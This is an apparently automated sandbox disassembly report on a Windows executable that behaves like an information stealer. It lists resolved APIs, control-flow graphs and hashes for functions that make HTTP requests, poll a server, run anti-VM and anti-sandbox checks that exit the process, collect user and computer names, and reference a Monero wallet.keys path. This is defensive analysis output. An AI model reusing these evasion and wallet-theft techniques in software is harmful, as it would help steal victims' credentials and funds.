                                      • GetProcAddress.KERNEL32(77040000,0131D158), ref: 00A4A402
                                      • GetProcAddress.KERNEL32(77040000,01318BD8), ref: 00A4A41A
                                      • GetProcAddress.KERNEL32(77040000,0131D038), ref: 00A4A433
                                      • GetProcAddress.KERNEL32(77040000,01305308), ref: 00A4A44B
                                      • GetProcAddress.KERNEL32(73D20000,0130A988), ref: 00A4A470
                                      • GetProcAddress.KERNEL32(73D20000,01304F88), ref: 00A4A489
                                      • GetProcAddress.KERNEL32(73D20000,0130A7A8), ref: 00A4A4A1
                                      • GetProcAddress.KERNEL32(73D20000,0131D098), ref: 00A4A4B9
                                      • GetProcAddress.KERNEL32(73D20000,0131D170), ref: 00A4A4D2
                                      • GetProcAddress.KERNEL32(73D20000,01305228), ref: 00A4A4EA
                                      • GetProcAddress.KERNEL32(73D20000,013052C8), ref: 00A4A502
                                      • GetProcAddress.KERNEL32(73D20000,0131D260), ref: 00A4A51B
                                      • GetProcAddress.KERNEL32(768D0000,01305188), ref: 00A4A53C
                                      • GetProcAddress.KERNEL32(768D0000,01304FE8), ref: 00A4A554
                                      • GetProcAddress.KERNEL32(768D0000,0131D050), ref: 00A4A56D
                                      • GetProcAddress.KERNEL32(768D0000,0131D1A0), ref: 00A4A585
                                      • GetProcAddress.KERNEL32(768D0000,01305208), ref: 00A4A59D
                                      • GetProcAddress.KERNEL32(75790000,0130A848), ref: 00A4A5C3
                                      • GetProcAddress.KERNEL32(75790000,0130A528), ref: 00A4A5DB
                                      • GetProcAddress.KERNEL32(75790000,0131D290), ref: 00A4A5F3
                                      • GetProcAddress.KERNEL32(75790000,01305248), ref: 00A4A60C
                                      • GetProcAddress.KERNEL32(75790000,01305328), ref: 00A4A624
                                      • GetProcAddress.KERNEL32(75790000,0130A7F8), ref: 00A4A63C
                                      • GetProcAddress.KERNEL32(75A10000,0131D200), ref: 00A4A662
                                      • GetProcAddress.KERNEL32(75A10000,01305288), ref: 00A4A67A
                                      • GetProcAddress.KERNEL32(75A10000,01318BE8), ref: 00A4A692
                                      • GetProcAddress.KERNEL32(75A10000,0131D2D8), ref: 00A4A6AB
                                      • GetProcAddress.KERNEL32(75A10000,0131D1B8), ref: 00A4A6C3
                                      • GetProcAddress.KERNEL32(75A10000,01304FA8), ref: 00A4A6DB
                                      • GetProcAddress.KERNEL32(75A10000,01305148), ref: 00A4A6F4
                                      • GetProcAddress.KERNEL32(75A10000,0131D1D0), ref: 00A4A70C
                                      • GetProcAddress.KERNEL32(75A10000,0131D308), ref: 00A4A724
                                      • GetProcAddress.KERNEL32(76850000,013051E8), ref: 00A4A746
                                      • GetProcAddress.KERNEL32(76850000,0131D080), ref: 00A4A75E
                                      • GetProcAddress.KERNEL32(76850000,0131D1E8), ref: 00A4A776
                                      • GetProcAddress.KERNEL32(76850000,0131D218), ref: 00A4A78F
                                      • GetProcAddress.KERNEL32(76850000,0131D278), ref: 00A4A7A7
                                      • GetProcAddress.KERNEL32(75690000,01305348), ref: 00A4A7C8
                                      • GetProcAddress.KERNEL32(75690000,01305108), ref: 00A4A7E1
                                      • GetProcAddress.KERNEL32(769C0000,01305048), ref: 00A4A802
                                      • GetProcAddress.KERNEL32(769C0000,0131D0B0), ref: 00A4A81A
                                      • GetProcAddress.KERNEL32(6F8C0000,01305128), ref: 00A4A840
                                      • GetProcAddress.KERNEL32(6F8C0000,013050E8), ref: 00A4A858
                                      • GetProcAddress.KERNEL32(6F8C0000,013050A8), ref: 00A4A870
                                      • GetProcAddress.KERNEL32(6F8C0000,0131D5C0), ref: 00A4A889
                                      • GetProcAddress.KERNEL32(6F8C0000,013052A8), ref: 00A4A8A1
                                      • GetProcAddress.KERNEL32(6F8C0000,01305368), ref: 00A4A8B9
                                      • GetProcAddress.KERNEL32(6F8C0000,01305168), ref: 00A4A8D2
                                      • GetProcAddress.KERNEL32(6F8C0000,01305088), ref: 00A4A8EA
                                      • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 00A4A901
                                      • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 00A4A917
                                      • GetProcAddress.KERNEL32(75D90000,0131D3E0), ref: 00A4A939
                                      • GetProcAddress.KERNEL32(75D90000,01318B28), ref: 00A4A951
                                      • GetProcAddress.KERNEL32(75D90000,0131D458), ref: 00A4A969
                                      • GetProcAddress.KERNEL32(75D90000,0131D410), ref: 00A4A982
                                      • GetProcAddress.KERNEL32(76470000,013052E8), ref: 00A4A9A3
                                      • GetProcAddress.KERNEL32(6D900000,0131D3F8), ref: 00A4A9C4
                                      • GetProcAddress.KERNEL32(6D900000,013050C8), ref: 00A4A9DD
                                      • GetProcAddress.KERNEL32(6D900000,0131D3B0), ref: 00A4A9F5
                                      • GetProcAddress.KERNEL32(6D900000,0131D3C8), ref: 00A4AA0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 0093b75f8454b972d5635701ac50ce77f0d7906ecb7cc6d3a2382f5927c10e01
                                      • Instruction ID: dc24a3bd8b56899a2fed25439bcffa045e89e11d1ff4e483c23f728376d83026
                                      • Opcode Fuzzy Hash: 0093b75f8454b972d5635701ac50ce77f0d7906ecb7cc6d3a2382f5927c10e01
                                      • Instruction Fuzzy Hash: 25621BB5A183009FC344DFA8EC88B567BB9A78D701710961ABA0DCB3B0D735B951CBB5
                                      Function 00A348D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 801 a348d0-a34992 call a4aab0 call a34800 call a4aa50 * 5 InternetOpenA StrCmpCA 816 a34994 801->816 817 a3499b-a3499f 801->817 816->817 818 a349a5-a34b1d call a48cf0 call a4ac30 call a4abb0 call a4ab10 * 2 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4ac30 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4ac30 call a4abb0 call a4ab10 * 2 InternetConnectA 817->818 819 a34f1b-a34f43 InternetCloseHandle call a4ade0 call a3a210 817->819 818->819 905 a34b23-a34b27 818->905 829 a34f82-a34ff2 call a48b20 * 2 call a4aab0 call a4ab10 * 8 819->829 830 a34f45-a34f7d call a4ab30 call a4acc0 call a4abb0 call a4ab10 819->830 830->829 906 a34b35 905->906 907 a34b29-a34b33 905->907 908 a34b3f-a34b72 HttpOpenRequestA 906->908 907->908 909 a34b78-a34e78 call a4acc0 call a4abb0 call a4ab10 call a4ac30 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4ac30 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4ac30 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4acc0 call a4abb0 call a4ab10 call a4ac30 call a4abb0 call a4ab10 call a4aa50 call a4ac30 * 2 call a4abb0 call a4ab10 * 2 call a4ade0 lstrlen call a4ade0 * 2 lstrlen call a4ade0 HttpSendRequestA 908->909 910 a34f0e-a34f15 InternetCloseHandle 908->910 1021 a34e82-a34eac InternetReadFile 909->1021 910->819 1022 a34eb7-a34f09 InternetCloseHandle call a4ab10 1021->1022 1023 a34eae-a34eb5 1021->1023 1022->910 1023->1022 1024 a34eb9-a34ef7 call a4acc0 call a4abb0 call a4ab10 1023->1024 1024->1021
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A34889
                                        • Part of subcall function 00A34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A34899
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A34965
                                      • StrCmpCA.SHLWAPI(?,0131F410), ref: 00A3498A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A34B0A
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00A50DDE,00000000,?,?,00000000,?,",00000000,?,0131F420), ref: 00A34E38
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A34E54
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A34E68
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A34E99
                                      • InternetCloseHandle.WININET(00000000), ref: 00A34EFD
                                      • InternetCloseHandle.WININET(00000000), ref: 00A34F15
                                      • HttpOpenRequestA.WININET(00000000,0131F4E0,?,0131EE20,00000000,00000000,00400100,00000000), ref: 00A34B65
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00A34F1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 460715078-2180234286
                                      • Opcode ID: baa4785f2f74ada29cf9749d829a437faaaeaab875f8a148fb4ca1e8ec7e2070
                                      • Instruction ID: 712c620b3f7abada61c171ec8a7c35a87f81a165bde2d0f5fb2ba133657ae4ed
                                      • Opcode Fuzzy Hash: baa4785f2f74ada29cf9749d829a437faaaeaab875f8a148fb4ca1e8ec7e2070
                                      • Instruction Fuzzy Hash: D8122E76950618ABDB15EB90DEA2FEEB339BFA4300F104599F10662491DF306F49CF62
                                      Function 00A45760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1090 a45760-a457c7 call a45d20 call a4ab30 * 3 call a4aa50 * 4 1106 a457cc-a457d3 1090->1106 1107 a457d5-a45806 call a4ab30 call a4aab0 call a31590 call a45440 1106->1107 1108 a45827-a4589c call a4aa50 * 2 call a31590 call a45510 call a4abb0 call a4ab10 call a4ade0 StrCmpCA 1106->1108 1123 a4580b-a45822 call a4abb0 call a4ab10 1107->1123 1134 a458e3-a458f9 call a4ade0 StrCmpCA 1108->1134 1138 a4589e-a458de call a4aab0 call a31590 call a45440 call a4abb0 call a4ab10 1108->1138 1123->1134 1139 a45a2c-a45a94 call a4abb0 call a4ab30 * 2 call a316b0 call a4ab10 * 4 call a31670 call a31550 1134->1139 1140 a458ff-a45906 1134->1140 1138->1134 1269 a45d13-a45d16 1139->1269 1142 a4590c-a45913 1140->1142 1143 a45a2a-a45aaf call a4ade0 StrCmpCA 1140->1143 1146 a45915-a45969 call a4ab30 call a4aab0 call a31590 call a45440 call a4abb0 call a4ab10 1142->1146 1147 a4596e-a459e3 call a4aa50 * 2 call a31590 call a45510 call a4abb0 call a4ab10 call a4ade0 StrCmpCA 1142->1147 1162 a45ab5-a45abc 1143->1162 1163 a45be1-a45c49 call a4abb0 call a4ab30 * 2 call a316b0 call a4ab10 * 4 call a31670 call a31550 1143->1163 1146->1143 1147->1143 1246 a459e5-a45a25 call a4aab0 call a31590 call a45440 call a4abb0 call a4ab10 1147->1246 1168 a45ac2-a45ac9 1162->1168 1169 a45bdf-a45c64 call a4ade0 StrCmpCA 1162->1169 1163->1269 1175 a45b23-a45b98 call a4aa50 * 2 call a31590 call a45510 call a4abb0 call a4ab10 call a4ade0 StrCmpCA 1168->1175 1176 a45acb-a45b1e call a4ab30 call a4aab0 call a31590 call a45440 call a4abb0 call a4ab10 1168->1176 1198 a45c66-a45c71 Sleep 1169->1198 1199 a45c78-a45ce1 call a4abb0 call a4ab30 * 2 call a316b0 call a4ab10 * 4 call a31670 call a31550 1169->1199 1175->1169 1274 a45b9a-a45bda call a4aab0 call a31590 call a45440 call a4abb0 call a4ab10 1175->1274 1176->1169 1198->1106 1199->1269 1246->1143 1274->1169
                                      APIs
                                        • Part of subcall function 00A4AB30: lstrlen.KERNEL32(00A34F55,?,?,00A34F55,00A50DDF), ref: 00A4AB3B
                                        • Part of subcall function 00A4AB30: lstrcpy.KERNEL32(00A50DDF,00000000), ref: 00A4AB95
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A45894
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A458F1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A45AA7
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A45440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A45478
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A45510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A45568
                                        • Part of subcall function 00A45510: lstrlen.KERNEL32(00000000), ref: 00A4557F
                                        • Part of subcall function 00A45510: StrStrA.SHLWAPI(00000000,00000000), ref: 00A455B4
                                        • Part of subcall function 00A45510: lstrlen.KERNEL32(00000000), ref: 00A455D3
                                        • Part of subcall function 00A45510: lstrlen.KERNEL32(00000000), ref: 00A455FE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A459DB
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A45B90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A45C5C
                                      • Sleep.KERNEL32(0000EA60), ref: 00A45C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-2791005934
                                      • Opcode ID: 29af9622cfb765c3650cf8997bcb069ca4926dcb2669cf20d3030b4d9a8c732e
                                      • Instruction ID: bab34a3b9b641f6121865fda6babd8f4f9d4b041a5f0d9ebe2b117b6de2f4baa
                                      • Opcode Fuzzy Hash: 29af9622cfb765c3650cf8997bcb069ca4926dcb2669cf20d3030b4d9a8c732e
                                      • Instruction Fuzzy Hash: B4E14276D505049BDB14FBB0DEA2EED733DEFA4340F508568B50666192EF30AE09CB62
                                      Function 00A419F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1301 a419f0-a41a1d call a4ade0 StrCmpCA 1304 a41a27-a41a41 call a4ade0 1301->1304 1305 a41a1f-a41a21 ExitProcess 1301->1305 1309 a41a44-a41a48 1304->1309 1310 a41c12-a41c1d call a4ab10 1309->1310 1311 a41a4e-a41a61 1309->1311 1313 a41a67-a41a6a 1311->1313 1314 a41bee-a41c0d 1311->1314 1316 a41a85-a41a94 call a4ab30 1313->1316 1317 a41bc0-a41bd1 StrCmpCA 1313->1317 1318 a41b41-a41b52 StrCmpCA 1313->1318 1319 a41ba1-a41bb2 StrCmpCA 1313->1319 1320 a41b82-a41b93 StrCmpCA 1313->1320 1321 a41b63-a41b74 StrCmpCA 1313->1321 1322 a41aad-a41abe StrCmpCA 1313->1322 1323 a41acf-a41ae0 StrCmpCA 1313->1323 1324 a41a71-a41a80 call a4ab30 1313->1324 1325 a41afd-a41b0e StrCmpCA 1313->1325 1326 a41b1f-a41b30 StrCmpCA 1313->1326 1327 a41bdf-a41be9 call a4ab30 1313->1327 1328 a41a99-a41aa8 call a4ab30 1313->1328 1314->1309 1316->1314 1349 a41bd3-a41bd6 1317->1349 1350 a41bdd 1317->1350 1340 a41b54-a41b57 1318->1340 1341 a41b5e 1318->1341 1346 a41bb4-a41bb7 1319->1346 1347 a41bbe 1319->1347 1344 a41b95-a41b98 1320->1344 1345 a41b9f 1320->1345 1342 a41b76-a41b79 1321->1342 1343 a41b80 1321->1343 1332 a41ac0-a41ac3 1322->1332 1333 a41aca 1322->1333 1334 a41ae2-a41aec 1323->1334 1335 a41aee-a41af1 1323->1335 1324->1314 1336 a41b10-a41b13 1325->1336 1337 a41b1a 1325->1337 1338 a41b32-a41b35 1326->1338 1339 a41b3c 1326->1339 1327->1314 1328->1314 1332->1333 1333->1314 1353 a41af8 1334->1353 1335->1353 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1343 1343->1314 1344->1345 1345->1314 1346->1347 1347->1314 1349->1350 1350->1314 1353->1314
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00A41A15
                                      • ExitProcess.KERNEL32 ref: 00A41A21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: 15f973705adeb9290eb525332e5fd936d4ebf1287ed5dd52be4498cc9f4e3497
                                      • Instruction ID: d54165e35cbc59f0620d17a713b8c7946f414aa6697751da41ed51b2553b013a
                                      • Opcode Fuzzy Hash: 15f973705adeb9290eb525332e5fd936d4ebf1287ed5dd52be4498cc9f4e3497
                                      • Instruction Fuzzy Hash: 97514A79B08209EFDB44DFA4DA44FAE77B9FF84704F104458E806AB240E770E986CB61
                                      Function 00A46C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013117C8), ref: 00A49BF1
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013116A8), ref: 00A49C0A
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01311768), ref: 00A49C22
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013116C0), ref: 00A49C3A
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01311750), ref: 00A49C53
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01318B08), ref: 00A49C6B
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013056C8), ref: 00A49C83
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013054C8), ref: 00A49C9C
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013117B0), ref: 00A49CB4
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013114F8), ref: 00A49CCC
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,013116D8), ref: 00A49CE5
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01311708), ref: 00A49CFD
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01305568), ref: 00A49D15
                                        • Part of subcall function 00A49BB0: GetProcAddress.KERNEL32(77190000,01311588), ref: 00A49D2E
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A311D0: ExitProcess.KERNEL32 ref: 00A31211
                                        • Part of subcall function 00A31160: GetSystemInfo.KERNEL32(?), ref: 00A3116A
                                        • Part of subcall function 00A31160: ExitProcess.KERNEL32 ref: 00A3117E
                                        • Part of subcall function 00A31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A3112B
                                        • Part of subcall function 00A31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00A31132
                                        • Part of subcall function 00A31110: ExitProcess.KERNEL32 ref: 00A31143
                                        • Part of subcall function 00A31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A3123E
                                        • Part of subcall function 00A31220: __aulldiv.LIBCMT ref: 00A31258
                                        • Part of subcall function 00A31220: __aulldiv.LIBCMT ref: 00A31266
                                        • Part of subcall function 00A31220: ExitProcess.KERNEL32 ref: 00A31294
                                        • Part of subcall function 00A46A10: GetUserDefaultLangID.KERNEL32 ref: 00A46A14
                                        • Part of subcall function 00A31190: ExitProcess.KERNEL32 ref: 00A311C6
                                        • Part of subcall function 00A479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A311B7), ref: 00A47A10
                                        • Part of subcall function 00A479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A47A17
                                        • Part of subcall function 00A479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A47A2F
                                        • Part of subcall function 00A47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47AA0
                                        • Part of subcall function 00A47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00A47AA7
                                        • Part of subcall function 00A47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00A47ABF
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
